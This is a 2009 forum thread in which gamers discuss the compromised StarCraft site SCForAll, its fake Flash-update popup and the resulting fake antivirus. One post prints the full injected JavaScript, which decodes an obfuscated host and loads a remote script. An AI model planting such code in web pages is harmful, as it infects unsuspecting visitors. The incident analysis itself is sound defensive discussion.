• Log InLog In
  • Register
Liquid`
Team Liquid Liquipedia
EDT 18:19
CEST 00:19
KST 07:19
  • Home
  • Forum
  • Calendar
  • Streams
  • Liquipedia
  • Features
  • Store
  • EPT
  • TL+
  • StarCraft 2
  • Brood War
  • Smash
  • Heroes
  • Counter-Strike
  • Overwatch
  • Liquibet
  • Fantasy StarCraft
  • TLPD
  • StarCraft 2
  • Brood War
  • Blogs
Forum Sidebar
Events/Features
News
Featured News
RSL Season 1 - Final Week6[ASL19] Finals Recap: Standing Tall12HomeStory Cup 27 - Info & Preview18Classic wins Code S Season 2 (2025)16Code S RO4 & Finals Preview: herO, Rogue, Classic, GuMiho0
Community News
Team TLMC #5 - Submission extension0Firefly given lifetime ban by ESIC following match-fixing investigation17$25,000 Streamerzone StarCraft Pro Series announced7Weekly Cups (June 30 - July 6): Classic Doubles7[BSL20] Non-Korean Championship 4x BSL + 4x China10
StarCraft 2
General
Team TLMC #5 - Submission extension TL Team Map Contest #5: Presented by Monster Energy RSL Revival patreon money discussion thread The GOAT ranking of GOAT rankings Weekly Cups (June 30 - July 6): Classic Doubles
Tourneys
$5,100+ SEL Season 2 Championship (SC: Evo) WardiTV Mondays RSL: Revival, a new crowdfunded tournament series Sparkling Tuna Cup - Weekly Open Tournament FEL Cracov 2025 (July 27) - $8000 live event
Strategy
How did i lose this ZvP, whats the proper response Simple Questions Simple Answers
Custom Maps
External Content
Mutation # 482 Wheel of Misfortune Mutation # 481 Fear and Lava Mutation # 480 Moths to the Flame Mutation # 479 Worn Out Welcome
Brood War
General
Flash Announces Hiatus From ASL BW General Discussion [ASL19] Finals Recap: Standing Tall BGH Auto Balance -> http://bghmmr.eu/ A cwal.gg Extension - Easily keep track of anyone
Tourneys
[Megathread] Daily Proleagues 2025 ACS Season 2 Qualifier Small VOD Thread 2.0 Last Minute Live-Report Thread Resource!
Strategy
Simple Questions, Simple Answers I am doing this better than progamers do.
Other Games
General Games
Path of Exile Stormgate/Frost Giant Megathread CCLP - Command & Conquer League Project The PlayStation 5 Nintendo Switch Thread
Dota 2
Official 'what is Dota anymore' discussion
League of Legends
Heroes of the Storm
Simple Questions, Simple Answers Heroes of the Storm 2.0
Hearthstone
Heroes of StarCraft mini-set
TL Mafia
TL Mafia Community Thread Vanilla Mini Mafia
Community
General
US Politics Mega-thread Summer Games Done Quick 2025! Russo-Ukrainian War Thread Things Aren’t Peaceful in Palestine The Accidental Video Game Porn Archive
Fan Clubs
SKT1 Classic Fan Club! Maru Fan Club
Media & Entertainment
Movie Discussion! [Manga] One Piece Anime Discussion Thread [\m/] Heavy Metal Thread
Sports
Formula 1 Discussion 2024 - 2025 Football Thread NBA General Discussion TeamLiquid Health and Fitness Initiative For 2023 NHL Playoffs 2024
World Cup 2022
Tech Support
Computer Build, Upgrade & Buying Resource Thread
TL Community
The Automated Ban List
Blogs
Men Take Risks, Women Win Ga…
TrAiDoS
momentary artworks from des…
tankgirl
from making sc maps to makin…
Husyelt
StarCraft improvement
iopq
Trip to the Zoo
micronesia
Customize Sidebar...

Website Feedback

Closed Threads



Active: 659 users

ScForAll unsafe...

Forum Index > BW General
Post a Reply
Normal
JeanGuy
Profile Joined August 2009
Canada18 Posts
Last Edited: 2009-09-27 19:51:10
September 26 2009 04:00 GMT
#1
Mod Note: Do not visit ScForAll.com unless you have a fully updated browser, flash player, QuickTime, Java and Adobe Reader or you risk having malware automatically installed through exploits in any old versions of the above software. I recommend using Secunia PSI (http://secunia.com/vulnerability_scanning/personal/) to do a complete scan of your system for vulnerable software.


Has this been discussed anywhere? Yesterday I had to use an image because some virus or w/e I got on scforall ( yes i'm a dumbass and clicked on something that popped up ) crashed my comp. I just went on scforall 2 minutes ago and I thought I saw a glimpse at a headline saying the site was under attack but then my antivirus closed the website saying it was unsafe so I got scared... Anyone got any idea whats going on?
lac29
Profile Blog Joined December 2008
United States1485 Posts
September 26 2009 04:03 GMT
#2
It works fine for me.
Polar_Nada
Profile Blog Joined June 2008
United States1548 Posts
September 26 2009 04:06 GMT
#3
right when i went to the site, they wanted me to update adobe flash. anybody got this too?
[ReD]NaDa and fnaticMSI.SEn fighting~! ::POlar @ UC Irvine::
blabber
Profile Blog Joined June 2007
United States4448 Posts
Last Edited: 2009-09-26 04:06:57
September 26 2009 04:06 GMT
#4
been discussed a little bit here
http://www.teamliquid.net/forum/viewmessage.php?topic_id=102481

yes the flash update seems to be the source of the malware
blabberrrrr
iLoveKT
Profile Blog Joined October 2008
Philippines3615 Posts
September 26 2009 04:06 GMT
#5
in case you still cant access scforall. (works fine for me)
+ Show Spoiler +
Hi, yesterday we had a problem with the SCForAll website, for some reason it was showing that the website was under attack by some malware, or that we might have been linked to a site hosting malware, so Google then decided to put an "Attack Site" picture on the front page.

To sum everything up:

1. Google hates Korean applications.
2. SCForAll uses a Korean server to host the videos on, called Afreeca, just like the player you see live casted Starcraft games on.
3. Is there any virus or malware being distributed at SCForAll? NO.
4. Has this "Site Attack" sign been up in the past? Yes, last year there was a Site Attack sign, it was due to the same reason, and it was fixed once we saw the problem.
5. Do you still see the site attack sign? I personally don’t see it anymore, but deleting your cookies might help the problem, if not, the warning sign will go away shortly.

Sorry for any inconvenience or worry you might of had.


scforall
Woo Jung Ho
Manifesto7
Profile Blog Joined November 2002
Osaka27146 Posts
September 26 2009 04:09 GMT
#6
I get the warning everywhere afreeca is used. You get it in many TL blogs with image links too.
ModeratorGodfather
JeanGuy
Profile Joined August 2009
Canada18 Posts
September 26 2009 04:09 GMT
#7
Don't install that adobe I had just changed some stuff on my comp and adobe wasnt installed for real so i thought it was a legit popup... i clicked it and then my desktop went angry blue color and told me to hide my wife and kids in a big white typing.. no joke
JeanGuy
Profile Joined August 2009
Canada18 Posts
September 26 2009 04:10 GMT
#8
On September 26 2009 13:09 Manifesto7 wrote:
I get the warning everywhere afreeca is used. You get it in many TL blogs with image links too.


it wasnt just a warning, it flat out closed the website lol
JeanGuy
Profile Joined August 2009
Canada18 Posts
September 26 2009 04:11 GMT
#9
On September 26 2009 13:10 JeanGuy wrote:
Show nested quote +
On September 26 2009 13:09 Manifesto7 wrote:
I get the warning everywhere afreeca is used. You get it in many TL blogs with image links too.


it wasnt just a warning, it flat out closed the website lol

on top of that, i got the popups all over my face right before the site closed
nicoaldo
Profile Joined March 2009
Argentina939 Posts
September 26 2009 04:13 GMT
#10
Artosis explained it in the site, afreeca is listed as a suspicious server by google, and scforall uses it. They are going to fix it soon i think.
JeanGuy
Profile Joined August 2009
Canada18 Posts
September 26 2009 04:15 GMT
#11
On September 26 2009 13:13 nicoaldo wrote:
Artosis explained it in the site, afreeca is listed as a suspicious server by google, and scforall uses it. They are going to fix it soon i think.


its not about afreeca being suspicious, you get popups like that guy said about some adobe shit and if you click it you're fucked and have to use an image to get your comp back to normal
SonuvBob
Profile Blog Joined October 2006
Aiur21549 Posts
Last Edited: 2009-09-26 04:27:14
September 26 2009 04:16 GMT
#12
On September 26 2009 13:06 iLoveKT wrote:
in case you still cant access scforall. (works fine for me)
+ Show Spoiler +
Hi, yesterday we had a problem with the SCForAll website, for some reason it was showing that the website was under attack by some malware, or that we might have been linked to a site hosting malware, so Google then decided to put an "Attack Site" picture on the front page.

To sum everything up:

1. Google hates Korean applications.
2. SCForAll uses a Korean server to host the videos on, called Afreeca, just like the player you see live casted Starcraft games on.
3. Is there any virus or malware being distributed at SCForAll? NO.
4. Has this "Site Attack" sign been up in the past? Yes, last year there was a Site Attack sign, it was due to the same reason, and it was fixed once we saw the problem.
5. Do you still see the site attack sign? I personally don’t see it anymore, but deleting your cookies might help the problem, if not, the warning sign will go away shortly.

Sorry for any inconvenience or worry you might of had.


scforall

The very questionable flash popup makes me think that isn't the case this time.

edit: upgraded flash (through the official site :p) and I don't get the popup now. Might be legit then, but it goes out of its way to look otherwise.
Administrator
AcrossFiveJulys
Profile Blog Joined September 2005
United States3612 Posts
September 26 2009 04:28 GMT
#13
they definitely got hacked. that flash popup is 100% malware.
JeanGuy
Profile Joined August 2009
Canada18 Posts
September 26 2009 04:32 GMT
#14
On September 26 2009 13:16 SonuvBob wrote:
Show nested quote +
On September 26 2009 13:06 iLoveKT wrote:
in case you still cant access scforall. (works fine for me)
+ Show Spoiler +
Hi, yesterday we had a problem with the SCForAll website, for some reason it was showing that the website was under attack by some malware, or that we might have been linked to a site hosting malware, so Google then decided to put an "Attack Site" picture on the front page.

To sum everything up:

1. Google hates Korean applications.
2. SCForAll uses a Korean server to host the videos on, called Afreeca, just like the player you see live casted Starcraft games on.
3. Is there any virus or malware being distributed at SCForAll? NO.
4. Has this "Site Attack" sign been up in the past? Yes, last year there was a Site Attack sign, it was due to the same reason, and it was fixed once we saw the problem.
5. Do you still see the site attack sign? I personally don’t see it anymore, but deleting your cookies might help the problem, if not, the warning sign will go away shortly.

Sorry for any inconvenience or worry you might of had.


scforall

The very questionable flash popup makes me think that isn't the case this time.

edit: upgraded flash (through the official site :p) and I don't get the popup now. Might be legit then, but it goes out of its way to look otherwise.


I clicked it once and I can tell you it's not legit in any way haha
Initial_H.C.
Profile Blog Joined September 2008
Canada560 Posts
September 26 2009 04:42 GMT
#15
I actually end up downloading that fake flash update without thinking at all. When I clicked it to install nothing happened. The next day I turned on my computer and my background changed to some warning message saying I got some malware I couldn't remove. I had to do a system restore to save my computer without reformatting.
SonuvBob
Profile Blog Joined October 2006
Aiur21549 Posts
Last Edited: 2009-09-26 05:01:57
September 26 2009 04:49 GMT
#16
On September 26 2009 13:32 JeanGuy wrote:
Show nested quote +
On September 26 2009 13:16 SonuvBob wrote:
On September 26 2009 13:06 iLoveKT wrote:
in case you still cant access scforall. (works fine for me)
+ Show Spoiler +
Hi, yesterday we had a problem with the SCForAll website, for some reason it was showing that the website was under attack by some malware, or that we might have been linked to a site hosting malware, so Google then decided to put an "Attack Site" picture on the front page.

To sum everything up:

1. Google hates Korean applications.
2. SCForAll uses a Korean server to host the videos on, called Afreeca, just like the player you see live casted Starcraft games on.
3. Is there any virus or malware being distributed at SCForAll? NO.
4. Has this "Site Attack" sign been up in the past? Yes, last year there was a Site Attack sign, it was due to the same reason, and it was fixed once we saw the problem.
5. Do you still see the site attack sign? I personally don’t see it anymore, but deleting your cookies might help the problem, if not, the warning sign will go away shortly.

Sorry for any inconvenience or worry you might of had.


scforall

The very questionable flash popup makes me think that isn't the case this time.

edit: upgraded flash (through the official site :p) and I don't get the popup now. Might be legit then, but it goes out of its way to look otherwise.


I clicked it once and I can tell you it's not legit in any way haha

Yeah just noticed scforall loads a script from a russian site, which in turn tries to make you d/l that exe from phonester.com (both of which give you a 0 byte file if referer and user agent aren't set right)

edit: tried scanning the file w/Kaspersky's online thing and Malwarebytes' Anti-Malware, both said it was clean... not that that really proves anything.

edit2: now it's using warnerbrazas.com instead of zima07.ru. Both are the same IP (174.120.61.126)
Administrator
PanN
Profile Blog Joined December 2008
United States2828 Posts
September 26 2009 04:54 GMT
#17
Is there any virus or malware being distributed at SCForAll? YES.
We have multiple brackets generated in advance. Relax . (Kennigit) I just simply do not understand how it can be the time to play can be 22nd at 9:30 pm PST / midnight the 23rd at the same time. (GGzerg)
Siz)Beggar
Profile Joined May 2008
United States339 Posts
September 26 2009 06:18 GMT
#18
if you click the adobe player update it viruses your computer you cant do anything to get rid of it except reformat the cpu or buy the software i had to learn the hard way q.q
Doso
Profile Joined March 2008
Germany769 Posts
September 26 2009 06:33 GMT
#19
I had a popup on that page that wanted to load a pdf from a russian server.. eh.
Afreeca you say? Site-hack i say....
PanN
Profile Blog Joined December 2008
United States2828 Posts
September 26 2009 07:33 GMT
#20
On September 26 2009 15:18 Siz)Beggar wrote:
if you click the adobe player update it viruses your computer you cant do anything to get rid of it except reformat the cpu or buy the software i had to learn the hard way q.q


1.) Why would you talk about something you have no idea about?

You can get rid of it with many programs, mal-ware bytes, or spybot S&D would be fine.

2.) You don't reformat a CPU, you reformat a harddrive.
We have multiple brackets generated in advance. Relax . (Kennigit) I just simply do not understand how it can be the time to play can be 22nd at 9:30 pm PST / midnight the 23rd at the same time. (GGzerg)
pR0gR4m3R
Profile Joined February 2008
Spain1446 Posts
Last Edited: 2009-09-26 07:48:15
September 26 2009 07:47 GMT
#21
On September 26 2009 13:09 Manifesto7 wrote:
I get the warning everywhere afreeca is used. You get it in many TL blogs with image links too.


Google tells me before entering afreeca that is a badware website

StarCraft-ESP.com Admin - Spanish StarCraft Community
Mandalor
Profile Blog Joined February 2003
Germany2362 Posts
September 26 2009 10:57 GMT
#22
On September 26 2009 16:33 PanN wrote:
Show nested quote +
On September 26 2009 15:18 Siz)Beggar wrote:
if you click the adobe player update it viruses your computer you cant do anything to get rid of it except reformat the cpu or buy the software i had to learn the hard way q.q


1.) Why would you talk about something you have no idea about?

You can get rid of it with many programs, mal-ware bytes, or spybot S&D would be fine.

2.) You don't reformat a CPU, you reformat a harddrive.


1) he's right. I had that happen to me about half a year ago. I tried every anti-virus/-malware program you can think of and it didn't help.

2) cpu is sometimes used as an abreviation for computer. We all knew what he was talking about anyway.
motbob
Profile Blog Joined July 2008
United States12546 Posts
September 26 2009 11:08 GMT
#23
On September 26 2009 19:57 Mandalor wrote:
2) cpu is sometimes used as an abreviation for computer.

What? lol
ModeratorGood content always wins.
Mandalor
Profile Blog Joined February 2003
Germany2362 Posts
September 26 2009 11:12 GMT
#24
I should have said (falsely) used
cyronc
Profile Joined March 2008
218 Posts
Last Edited: 2009-09-26 12:50:30
September 26 2009 12:49 GMT
#25
cpu is almost everytime used as an abrevation for central processing unit LOL =)

sry i couldnt resist ...
iH82G8!
TheFoReveRwaR
Profile Blog Joined May 2006
United States10657 Posts
Last Edited: 2009-09-26 13:01:50
September 26 2009 13:00 GMT
#26
On September 26 2009 21:49 cyronc wrote:
cpu is almost everytime used as an abrevation for central processing unit LOL =)

sry i couldnt resist ...

That was a real knee slapper.



I had a virus(it couldve been an error too I suppose) recently that made it impossible to log in to windows. Could've been related. I can't remember exactly but I'm pretty sure I got it after doing an update to flash player. I thought it was odd because I had already updated flash player not too long ago but stupidly I did it anyway.
Being healthy, it has been said, really consists of having the same disease as everybody else.
50bani
Profile Blog Joined June 2009
Romania480 Posts
September 26 2009 15:25 GMT
#27
It is malware!!

Artosis your site is infected!

Had to restore factory settings. I was running Opera under Win XP. The funny thing is I did not even try to download it, it started itself so to speak... I think it is an attack using the Adobe plug-ins
I'm posting on twoplustwo because I have always been amazed at the level of talent that populates this site --- it's almost unparalleled on the Internet.
PanN
Profile Blog Joined December 2008
United States2828 Posts
September 26 2009 16:25 GMT
#28
On September 27 2009 00:25 50bani wrote:
It is malware!!

Artosis your site is infected!

Had to restore factory settings. I was running Opera under Win XP. The funny thing is I did not even try to download it, it started itself so to speak... I think it is an attack using the Adobe plug-ins


Wait, you reformatted?
We have multiple brackets generated in advance. Relax . (Kennigit) I just simply do not understand how it can be the time to play can be 22nd at 9:30 pm PST / midnight the 23rd at the same time. (GGzerg)
RyanS
Profile Blog Joined January 2009
United States620 Posts
September 26 2009 16:52 GMT
#29
[image loading]


For those that posted earlier about the afreeca warning, this is not the same thing.

I would avoid the site until it is fixed if you do not have a good anti-virus or can't spot a fake Adobe update page. ^.^
Doso
Profile Joined March 2008
Germany769 Posts
September 26 2009 17:10 GMT
#30
Jup, Firefox offered to download that file for me - probably since i addblock blocked the flash thingie for me.
50bani
Profile Blog Joined June 2009
Romania480 Posts
September 26 2009 17:45 GMT
#31
On September 27 2009 01:25 PanN wrote:
Show nested quote +
On September 27 2009 00:25 50bani wrote:
It is malware!!

Artosis your site is infected!

Had to restore factory settings. I was running Opera under Win XP. The funny thing is I did not even try to download it, it started itself so to speak... I think it is an attack using the Adobe plug-ins


Wait, you reformatted?

Yup. Restored factory contents to be more specific, since it is a "brand-name" computer. No problem saving stuff on DVD or USB stick but you have to reinstall stuff.
I'm posting on twoplustwo because I have always been amazed at the level of talent that populates this site --- it's almost unparalleled on the Internet.
Shikyo
Profile Blog Joined June 2008
Finland33997 Posts
September 26 2009 17:49 GMT
#32
On September 27 2009 02:45 50bani wrote:
Show nested quote +
On September 27 2009 01:25 PanN wrote:
On September 27 2009 00:25 50bani wrote:
It is malware!!

Artosis your site is infected!

Had to restore factory settings. I was running Opera under Win XP. The funny thing is I did not even try to download it, it started itself so to speak... I think it is an attack using the Adobe plug-ins


Wait, you reformatted?

Yup. Restored factory contents to be more specific, since it is a "brand-name" computer. No problem saving stuff on DVD or USB stick but you have to reinstall stuff.

Well, it of course can be a problem since the virus/worm/whatever could be in some of the files you saved.
League of Legends EU West, Platinum III | Yousei Teikoku is the best thing that has ever happened to music.
PanN
Profile Blog Joined December 2008
United States2828 Posts
September 26 2009 18:06 GMT
#33
On September 27 2009 02:45 50bani wrote:
Show nested quote +
On September 27 2009 01:25 PanN wrote:
On September 27 2009 00:25 50bani wrote:
It is malware!!

Artosis your site is infected!

Had to restore factory settings. I was running Opera under Win XP. The funny thing is I did not even try to download it, it started itself so to speak... I think it is an attack using the Adobe plug-ins


Wait, you reformatted?

Yup. Restored factory contents to be more specific, since it is a "brand-name" computer. No problem saving stuff on DVD or USB stick but you have to reinstall stuff.


I got the virus from site, didn't click anything.

Ran a scan with mal-ware bytes, and spybot. Rebooted in safe mode, scanned again. Rebooted normally, computer was fine.

You guys reformatting are insane.
We have multiple brackets generated in advance. Relax . (Kennigit) I just simply do not understand how it can be the time to play can be 22nd at 9:30 pm PST / midnight the 23rd at the same time. (GGzerg)
Monstah-_-
Profile Blog Joined September 2009
249 Posts
September 26 2009 18:32 GMT
#34
On September 26 2009 19:57 Mandalor wrote:
Show nested quote +
On September 26 2009 16:33 PanN wrote:
On September 26 2009 15:18 Siz)Beggar wrote:
if you click the adobe player update it viruses your computer you cant do anything to get rid of it except reformat the cpu or buy the software i had to learn the hard way q.q


1.) Why would you talk about something you have no idea about?

You can get rid of it with many programs, mal-ware bytes, or spybot S&D would be fine.

2.) You don't reformat a CPU, you reformat a harddrive.


1) he's right. I had that happen to me about half a year ago. I tried every anti-virus/-malware program you can think of and it didn't help.

2) cpu is sometimes used as an abreviation for computer. We all knew what he was talking about anyway.


LOL.

You mean Central processing unit?
you live in the woods and drink vodka
Deleriux
Profile Joined September 2009
10 Posts
September 26 2009 19:31 GMT
#35
scforall is spamming malware. Heres how.
If you check the page source right at the very bottom someone has inserted javascript.

The javascript does this basically:

Creates a string value such as: ODYFYQZYNMxCMACTFBaEQXEYpGZFCNCWsKCEDYQLeFKSaKQHCFAKKQrDNOGcUOOQVhYWBSMKQQI.TXNOEOcVUZoNATm (this is what I get) then removes all capital letters to get the site name which in my example is: xapserach.com

It then proceeds to add a link to this website to the [ head ] html element to browsers that renders the page as a [ script ] element.

So once the site is loaded your browser adds something like this -

[ head ]
[ script ]
xapsearch.com attack site code goes here.
[ /script ]
[ /head ]

I'm willing to bet whatever is hosted (or was hosted) there was even more javascript that installs exploits through peoples browsers.

Please fix this. If you dont believe me open the page source yourself and you'll see the javascript.
CoL_Fuehrer
Profile Joined August 2009
Russian Federation124 Posts
September 26 2009 19:39 GMT
#36
On September 26 2009 16:33 PanN wrote:
Show nested quote +
On September 26 2009 15:18 Siz)Beggar wrote:
if you click the adobe player update it viruses your computer you cant do anything to get rid of it except reformat the cpu or buy the software i had to learn the hard way q.q


1.) Why would you talk about something you have no idea about?

You can get rid of it with many programs, mal-ware bytes, or spybot S&D would be fine.

2.) You don't reformat a CPU, you reformat a harddrive.

Owned
LZGamer "I can get better at starcraft anytime but as for Idra he cannot change his face"
SonuvBob
Profile Blog Joined October 2006
Aiur21549 Posts
Last Edited: 2009-09-26 19:49:02
September 26 2009 19:47 GMT
#37
On September 27 2009 04:31 Deleriux wrote:
Please fix this. If you dont believe me open the page source yourself and you'll see the javascript.

Yeah, Artosis is away at WCG USA though. Don't know anyone else behind scforall.
Administrator
Patriot.dlk
Profile Blog Joined October 2004
Sweden5462 Posts
September 26 2009 19:53 GMT
#38
gosh so I guess I got it too. Well I'm running malwarebytes, nod and I have superantispyware/Spybot installed and updated but not running.

Going full scans now
TerraIncognita
Profile Joined April 2008
Germany55 Posts
Last Edited: 2009-09-26 21:23:41
September 26 2009 21:22 GMT
#39
Same problem for me. This morning my computer was infected by something called "Total Security", the PC crashed and the destop was full weird popups and stuff.

Tiny little pain in the ass but I got rid of it.

It's strongly recommended to avoid this site, until this security problem has solved at 100%.

For those, which got also infected: Malwarebytes cleaned this sucker perfectly.
o_O
Alphonsse
Profile Blog Joined March 2009
United States518 Posts
September 26 2009 22:06 GMT
#40
Kinda funny that they posted a defensive "theres nothing wrong with our site the warnings are full of shit" news post a few days ago. I like watching the weekly news and all the interviews there but they really need to get their shit together.
ghermination
Profile Blog Joined April 2008
United States2851 Posts
Last Edited: 2009-09-26 22:17:38
September 26 2009 22:12 GMT
#41
I visited earlier, ignored the attack site warnings. I didn't download anything because i'm not retarded but that didn't seem to spontanteously get me a virus so it seems one could still surf the site as long as they don't download anything.

http://www.scforall.com/news/news02.asp?mNum=n03&PageNo=1&where=&query=&sterm=&articleNum=644

While reading the "there is nothing wrong with the site" news post, i noticed this:

+ Show Spoiler +

Is this still not a sign that SCForAll is not being hacked? At the very least, please investigate why your Russian friends are able to easily edit /include/bottom.asp to include their nifty javscript code that loads an external javascript file that, in turn, loads the popup offering the malware download. Heck, also investigate why I was able to edit this news info! So please for the sake of your users and fellow Starcraft fans at least truly investigate stuff first before saying nothing is wrong.


apparently there are quite a few gaping security holes in scforall.com
U Gotta Skate.
Amarxist
Profile Blog Joined July 2008
United States371 Posts
September 26 2009 22:51 GMT
#42
I'm glad I run flash-block and no-script. I only allow javascript to run based on a whitelist. Anything new that comes up just doesn't run at all.
☺ ☻
piratebay
Profile Blog Joined April 2009
United States399 Posts
September 26 2009 22:55 GMT
#43
this just proves that TL is a better sight than scforall~~ haha

on a more serious note, i shall d/l the file to spite my university~
Rebuke[SkyNet]
Profile Joined September 2009
18 Posts
September 26 2009 23:01 GMT
#44
this site is def. not secure to visit yet, just letting you guys know. this has come to my attention about 3 months ago and ever since then i never touched the website, artosis/whoever need to take action asap. my computer won't even let me go to the site because its so dangerous
Cocaine isn't a habit, its a lifestyle.
DrTJEckleburg
Profile Blog Joined February 2009
United States1080 Posts
September 26 2009 23:47 GMT
#45
Glad I'm not the only one who had this problem. If you get the Total Security 2009 bullshit I got, you can just rename taskmgr.exe in system32 to iexplore.exe(the only program you can open) and end the task and then remove the virus.
Im pretty good at whistling with my hands, especially when Im holding a whistle.
OmniKnight
Profile Joined August 2008
United States73 Posts
September 27 2009 00:05 GMT
#46
Just simply reload the page and it'll go away .. you'd have to be the dumbest person in the world to actually click it
sashkata
Profile Joined September 2008
Bulgaria3241 Posts
September 27 2009 00:10 GMT
#47
To anyone who had that Total security 2009 thing I sugest checking your C:\WINDOWS\system32\drivers\etc hosts file. It's probably full of stuff like "127.0.0.2 google.com" It prevents you from acsesing google, yahoo search and some more search engines. Delete those lines (it will probably be everything in the file) and will be fixed.
Foucault
Profile Blog Joined May 2009
Sweden2826 Posts
September 27 2009 00:14 GMT
#48
Yeah I don't really trust scforall right now either. I had some weird virus thing pop up on that site, like it was hi-jacked or something
I know that deep inside of you there's a humongous set of testicles just waiting to pop out. Let 'em pop bro. //////////////////// AKA JensOfSweden // Lee Yoon Yeol forever.
KizZBG
Profile Blog Joined November 2006
u gotta skate8152 Posts
September 27 2009 00:20 GMT
#49
Similar thing happened to me the other day where I was asked to download some .pdf or something which I just ignored. Thankfully it didn't to anything to my system lol.

On September 27 2009 04:47 SonuvBob wrote:
Show nested quote +
On September 27 2009 04:31 Deleriux wrote:
Please fix this. If you dont believe me open the page source yourself and you'll see the javascript.

Yeah, Artosis is away at WCG USA though. Don't know anyone else behind scforall.

PuertoRican?
eSTRO for life | #2 Sea.Really fan! | #1 GosI[Flying] fan! | Clide - best SC2 terran!
aKshun
Profile Joined March 2009
Australia18 Posts
September 27 2009 01:27 GMT
#50
Website is 100% infected. Confirmed using Virtual Machine.

The code below executes a javascript command to create the "flash box" users are seeing. The first part of the code uses Cookies to only show the box on first entrance. Those of you who have been to the site, ignored the box and come back later to see if its still infected; will not see it if your cookies are enabled.

Upon allowing the website to install the "flash update" i noted 2 processes running. A long number stream under administrator using about 20k of mem and install_flash_player.exe

After a restart of the system, i have the very common "Total Security" fraudtool. http://www.bleepingcomputer.com/virus-removal/remove-total-security

Code:
+ Show Spoiler +

<script>function GetCookieVal (offset) { var endstr = document.cookie.indexOf (';', offset); if (endstr == -1) endstr = document.cookie.length; return unescape(document.cookie.substring(offset, endstr)); } function GetCookie (name) { var arg = name + '='; var alen = arg.length; var clen = document.cookie.length; var i = 0; while (i < clen) { var j = i + alen; if (document.cookie.substring(i, j) == arg) return GetCookieVal (j); i = document.cookie.indexOf(' ', i) + 1; if (i == 0) break; } return null; } function SetCookie (name, value) { var argv = SetCookie.arguments; var argc = SetCookie.arguments.length; var expires = (argc > 2) ? argv[2] : null; var path = (argc > 3) ? argv[3] : null; var domain = (argc > 4) ? argv[4] : null; var secure = (argc > 5) ? argv[5] : false; document.cookie = name + '=' + escape (value) + ((expires == null) ? '' : ('; expires=' + expires.toGMTString())) + ((path == null) ? '' : ('; path=' + path)) + ((domain == null) ? '' : ('; domain=' + domain)) + ((secure == true) ? '; secure' : ''); } if (GetCookie('x') == null) { var FoginosoteFalqe = 'ODYFYQZYNMxCMACTFBaEQXEYpGZFCNCWsKCEDYQLeFKSaKQHCFAKKQrDNOGcUOOQVhYWBSMKQQI.TXNOEOcVUZoNATm'.replace(/[A-Z]/g,''); var StudaliKqanuwupo = document.createElement('script'); StudaliKqanuwupo.src = 'http://' + FoginosoteFalqe + '/counter/?page=' + escape(document.referrer) + '&rnd=' + Math.random(); document.getElementsByTagName('head')[0].appendChild(StudaliKqanuwupo); var JzatuveYeput = new Date (); JzatuveYeput.setTime(JzatuveYeput.getTime() + (8*3600*1000)); SetCookie('x','1',JzatuveYeput, '/'); }</script>


Now, ScForAll aren't doing this on purpose, this is actually becoming one of the more common methods of malware dispersal through the internet. The infectious code is a little more advanced than the 1px by 1px iframes used by other fraudtools.


----

Contrary to what i read from other people, do not turn off your AV to use the website. Keep it up to date, when your AV blocks the attack; double-click the blue header and the frame is gone.
When you do something right, people wont notice youve done anything at all.
Manifesto7
Profile Blog Joined November 2002
Osaka27146 Posts
September 27 2009 01:43 GMT
#51
I blame this on the LastShadow interview.
ModeratorGodfather
Nytefish
Profile Blog Joined December 2007
United Kingdom4282 Posts
Last Edited: 2009-09-27 01:49:07
September 27 2009 01:48 GMT
#52
On September 27 2009 09:05 OmniKnight wrote:
Just simply reload the page and it'll go away .. you'd have to be the dumbest person in the world to actually click it


I avoided it because I was too lazy to get an update.
It's not that stupid to fall for something that looks like a flash player update.
No I'm never serious.
DrTJEckleburg
Profile Blog Joined February 2009
United States1080 Posts
September 27 2009 02:12 GMT
#53
On September 27 2009 09:05 OmniKnight wrote:
Just simply reload the page and it'll go away .. you'd have to be the dumbest person in the world to actually click it


Next time I'll use repel.
Im pretty good at whistling with my hands, especially when Im holding a whistle.
Tsagacity
Profile Blog Joined August 2005
United States2124 Posts
September 27 2009 02:13 GMT
#54
Wow. Now when I visit this site firefox gives me a preload page warning me that it's an attack site :O
"Everyone worse than me at video games is a noob. Everyone better than me doesn't have a life."
Catch]22
Profile Blog Joined July 2009
Sweden2683 Posts
Last Edited: 2009-09-27 02:15:11
September 27 2009 02:13 GMT
#55
so how do I check if I got infected, and how do i treat it?

edit: also, since when did this begin? chrome warned me from the very first time i entered the site
aKshun
Profile Joined March 2009
Australia18 Posts
September 27 2009 02:26 GMT
#56
so how do I check if I got infected, and how do i treat it?


Most obvious is that you will have a massive "fake antivirus" tool saying your infected with a bazillion malware that don't exist.

Restart your computer to confirm the above. If you are infected, if possible use an alternative PC to download Malwarebytes.org; rename the installer and then use it.
When you do something right, people wont notice youve done anything at all.
SpiritWolf
Profile Joined July 2008
United States127 Posts
Last Edited: 2009-09-27 02:27:13
September 27 2009 02:26 GMT
#57
On September 27 2009 11:13 Catch]22 wrote:
so how do I check if I got infected, and how do i treat it?

edit: also, since when did this begin? chrome warned me from the very first time i entered the site


I was stupid enough to click the link. If you were infected you would know. I it is a fake anti-spyware program called total security. Malwarebytes was able to kill it but not before it edited my hosts.txt to block every major search engine.
Initial_H.C.
Profile Blog Joined September 2008
Canada560 Posts
September 27 2009 03:10 GMT
#58
On September 27 2009 09:10 sashkata wrote:
To anyone who had that Total security 2009 thing I sugest checking your C:\WINDOWS\system32\drivers\etc hosts file. It's probably full of stuff like "127.0.0.2 google.com" It prevents you from acsesing google, yahoo search and some more search engines. Delete those lines (it will probably be everything in the file) and will be fixed.


Thanks for the suggestion. I was wondering why I couldn't get into all the search engines and had no idea how to fix it.
JohnColtrane
Profile Blog Joined July 2008
Australia4813 Posts
September 27 2009 03:14 GMT
#59
Do we know when this virii shit started happening on SCforall? because ive been on their site a little while ago and never got any fake adobe updates (or real adobe updates for that matter.)

i'm pretty sure it was within september
HEY MEYT
R1CH
Profile Blog Joined May 2007
Netherlands10340 Posts
Last Edited: 2009-09-27 03:25:49
September 27 2009 03:21 GMT
#60
It's always been happening, check the site history. That's what happens when you depend on too many remote includes (or have exploits in your site).

Google reported badware activity on www.scforall.com/ between Sep 24th 2009 and Sep 24th 2009
Google reported badware activity on scforall.com/forums/ on Mar 5th 2009
Google reported badware activity on scforall.com/news/ on Mar 5th 2009
Google reported badware activity on scforall.com/prog/ on Mar 5th 2009
Google reported badware activity on www.scforall.com/prog/ on Mar 4th 2009
Google reported badware activity on www.scforall.com/news/ on Mar 3rd 2009
Google reported badware activity on www.scforall.com/forums/ on Aug 27th 2008
AdministratorTwitter: @R1CH_TL
aKshun
